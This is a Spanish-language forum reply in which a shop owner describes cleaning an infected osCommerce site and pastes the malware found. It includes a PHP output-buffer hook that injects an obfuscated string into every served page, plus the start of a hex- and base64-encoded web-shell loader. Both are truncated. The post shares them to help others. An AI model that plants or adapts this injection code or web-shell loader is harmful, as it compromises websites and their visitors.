Tema: OSCommerce Infectado
Ver Mensaje Individual
  #2 (permalink)  
Antiguo 31/03/2011, 03:57
dariodafoz
 
Fecha de Ingreso: marzo-2011
Mensajes: 2
Antigüedad: 13 años, 1 mes
Puntos: 0
Respuesta: OSCommerce Infectado
Hola

ya encontré todas la paginas con código inyectado, y lo corregí. Más abajo escribo el código inyectado en la muchos php y también un php metido en la carpeta images (new_products_rss.php) con un código diferente.

Lo que ahora me preocupa es el cómo pudieron modificar los permisos a 777 cuando estaban a 775, estoy casi convencido de que no obtuvieron la contraseña por FTP... aunque por supuesto la modifique por seguridad. Había instalado un módulo de compra sin registro el cual me deje la carpeta instaladora... un error grave de seguridad, pero no sé si a partir de ahí pudieron obtener permisos a otras carpetas... si así fue puedo respirar tranquilo. (el módulo PWA coje permisos a archivos como login..etc, que son justamente los que estaban con código inyectado... eso debió ser).

Pues por si es de interés escribo el código inyectado:

if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, ..., 51); una buena lista númerica
$tr = array(51, ... , ) una buena lista númerica
$ob_htm = ''; foreach($tr as $tval) {
$ob_htm .= chr($tc[$tval]+32);
}

$slw=strtolower($s);
$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
if(!$i){$i=strlen($s);if($i){$i--;}}
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
} ?>

Y el archivo new_productos_rss.php además de lo anterior tenía lo siguiente:

<?php $auth_pass="";$color="#df5";$default_action='Files Man';$default_use_ajax=true;$default_charset='Wind ows-1251';preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNk Wf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlu.. . ETCETERA...


Un saludo